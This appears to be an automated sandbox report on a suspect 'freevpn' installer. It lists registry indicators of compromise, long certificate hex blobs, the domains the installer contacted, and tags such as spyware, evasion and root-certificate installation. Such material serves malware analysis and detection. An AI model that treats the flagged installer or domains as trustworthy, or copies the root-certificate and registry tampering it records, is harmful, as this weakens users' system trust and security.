Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	svchost.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\NextBrowserDataLogTime = 80b2d9f20ba3d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\NextUpdateDate = "337668302"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\Certificates\83DA05A9886F7658 = 03000000010000001400000083da05a9886f7658be73acf0a4930c0f99b92f011400000001000000140000003656896549cb5b9b2f3cac4216504d91b933d79104000000010000001000000062455357dd57cb80c32ab295743cccc00f00000001000000200000006811c6215f18c75fdbe32cf56bd66248562a7fa3ba459cfee338745061e583941900000001000000100000002d581a49c8eb5b3b3c6ef9bb65314d705c000000010000000400000000100000180000000100000010000000bb048f1838395f6fc3a1f3d2b7e976542000000001000000dc060000308206d8308204c0a003020102020a613fb718000000000004300d06092a864886f70d01010b0500308188310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e31323030060355040313294d6963726f736f667420526f6f7420436572746966696361746520417574686f726974792032303131301e170d3131313031383232353531395a170d3236313031383233303531395a307e310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e312830260603550403131f4d6963726f736f66742053656375726520536572766572204341203230313130820222300d06092a864886f70d01010105000382020f003082020a0282020100d00bc0a4a81981e236e5e2aae5f3b2155875beb4e549f1e084f9bb0d64ef85c18155b8f3e7f16d40553dce8b6ad18493f5757c5ba4d47410ca32f323d3aeeecf9e0458c2d947cbd17c004148711b01671718afc6fe73037ee4ef439cef01712a1f81264377985457739d552bf09e8e7d060eac1b54f326f7f82308228b9e061d3738fd72d2cae563c19a5a7db26db352a96ee9aeb5fc8b36f99efaf61c581b9756a511e5b752dbbbe9f054bfb4ff2c6cb85d26cea00ad7df93ed7fddacf12c731ad9193755badd22788ea1d49b09f807223171b094aee0b0e726445790819715ce61ec65e24bf185521632f8b578aa7ecd4dec8321a4a89bbe9a6a04e0a31ccd56186cfd6b2f423ee237f272abd07873727bdeec0058e52130a3083a99ef9fc3f77a169665b5c381aff4397049aff6a9f66a0038f9b40819e01a35a55676225f6af269ae3ead58464db854f68941441e72b1bc122753d2c1ffb2cd50981eb5f4bbb6c28239d9ac1bf23b27846ab0c6260bd73a10e7b3db7cd356ac534c0bfa3b313774d8592bf9007919067bfd1c1d42d4410d2f050ed56b4923ffcfcdf87a82cfda3c2ddfe8d8120418ba1e8877b8981f1007bbc8057e0b09bf6bdde34e5bb0f9c784a63bca4c9f5b6229f7c7a2a89588702ce5c13f3c52234f409ac33185832fbf29f11d508f219607ceeff280c2447d9b62ef2fc37789ab454d533e0279d30203010001a382014b30820147301006092b06010401823715010403020100301d0603551d0e041604143656896549cb5b9b2f3cac4216504d91b933d791301906092b0601040182371402040c1e0a00530075006200430041300b0603551d0f040403020186300f0603551d130101ff040530030101ff301f0603551d23041830168014722d3a02319043b914054ee1eaa7c731d1238934305a0603551d1f04533051304fa04da04b8649687474703a2f2f63726c2e6d6963726f736f66742e636f6d2f706b692f63726c2f70726f64756374732f4d6963526f6f436572417574323031315f323031315f30335f32322e63726c305e06082b0601050507010104523050304e06082b060105050730028642687474703a2f2f7777772e6d6963726f736f66742e636f6d2f706b692f63657274732f4d6963526f6f436572417574323031315f323031315f30335f32322e637274300d06092a864886f70d01010b0500038202010041c861c1f55b9e3e9131f1b0c6bf0901b49db69074d709dba62e0d9fc8e7763446af0760894c81b33cd5f4123575c273a5f54d848ccba45dafbf92f617085742957265057679adeed1bab82e54a35107ac68eb210ce32581c2cd2af2c3ffcfc2bd49189ac7f084c5f914bc6b95e596efb342d253d54aa012c4ae12765309560e9df7d3a6498850f28a2c9720a2be4e78ef0565b74ba11688de31c70842247ca47b9e9dbc60005e6297e393fca7fe5b7b25dfe4537f4bbee63ef0db0179421c6e856c7db64430fba5379293b2a5ee20ad3f53d5c9f4286b57c1f81d6ab7562ab627811ca62d9fe7f4d0318397a82ab6acbe1b41f5e4895f56fbda5ad35e7d5594107e5357f44a3d402ac8bd679f84e110eefdda6b158249fc461dff4506749c4214edc539d3b3cd0b832790435192f24482ae6e9a1517b219fac7456c98017bbf37a9b088a492bc3838e01de47c97981a2e5fef3865b7352fbd7f4f21fac48cd26f06f94935eadf200f25aaea60ab2c1f4b89fcb7fa5c54904b3ea2284f6ce45265c1fd901c8582886ee9a655dd21287945b014e50acce65fc4bbdb6134699fac2638f7c1294108152e4ca0f7f90c3ede5fab08092d83acac348362f4c949428925b56eb247c5b339a0b1201b2cb18e046fa530491cd046e9405bf4ad6ebadb824a87124a80094ddbdf76b9055b1be0bb20705f0025c7d30efa16ad7b229e7108	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\t.dtscout.com	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\dtscout.com\Total = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\totaltopposts.com\Total = "1060"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{IIRT641V-ST1Y-V6LD-W3TL-UIUSI353MX63}	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\PersistedStorageItemTable\System\{5B965391-9A4A-41CA-B2E9-1DC8FBEB24 = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000018a1922bdaa2d70118a1922bdaa2d701b3f4a02bdaa2d701b0ca8d000000000001000000000000000000000000000000dd0314001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800b0003100000000000000000010004d6963726f736f66742e4d6963726f736f6674456467655f3877656b796233643862627765007c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e004d006900630072006f0073006f006600740045006400670065005f003800770065006b00790062003300640038006200620077006500000034005c0031000000000000000000100054656d70537461746500440009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000540065006d00700053007400610074006500000018005c00310000000000000000001000446f776e6c6f61647300440009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000044006f0077006e006c006f0061006400730000001800a6003200b0ca8d002653d22520004652454556507e312e45584500008a0009000400efbe2653d2252653d2252e000000000000000000000000000000000000000000000000004de9a3006600720065006500760070006e005f00730065007400750070005f0065005f0077007000300030003100670030006800700034006300710073006b0039006100690069006e00390038007000630065002e0065007800650000001c000000bd0000001c000000010000001c0000002f00000000000000bc0000001300000003000000ef156bb3100000004f5300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e4d6963726f736f6674456467655f3877656b7962336438626277655c54656d7053746174655c446f776e6c6f6164735c6672656576706e5f73657475705f655f777030303167306870346371736b396169696e39387063652e657865000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000067736e747061777100000000000000002caaf1fc6ce8314f9f48a67ee6561374fd7e8df72f0bec11a248ca968fb30ddd2caaf1fc6ce8314f9f48a67ee6561374fd7e8df72f0bec11a248ca968fb30dddd2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0032003500350039003200380036003200390034002d0032003400330039003600310033003300350032002d0034003000330032003100390033003200380037002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001072437b000000000000500600000000000000000000000000000000	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\PersistedStorageItemTable\System\{5B965391-9A4A-41CA-B2E9-1DC8FBEB24 = "8320"	browser_broker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = b9d9ec28329fd701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\totaltopposts.com\ = "179"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\vg35.xyz\NumberOfSubdomai = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\propapps.info\NumberOfSub = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\totaltopposts.com	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\PersistedStorageItemTable\System\{5B965391-9A4A-41CA-B2E9-1DC8FBEB24 = "\\\\?\\Volume{7B437210-0000-0000-0000-500600000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\TempState\\Downloads\\freevpn_setup_e_wp001g0hp4cqsk9aiin98pce.exe"	browser_broker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "307"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "354"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 02378b93d9a2d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\totaltopposts.com\ = "0"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\totaltopposts.com\Total = "1062"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net	msiexec.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\OneTimeCleanup = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\totaltopposts.com\Total = "28"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState\EdpState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\dtscout.com	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 0d3eb98dd9a2d701	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
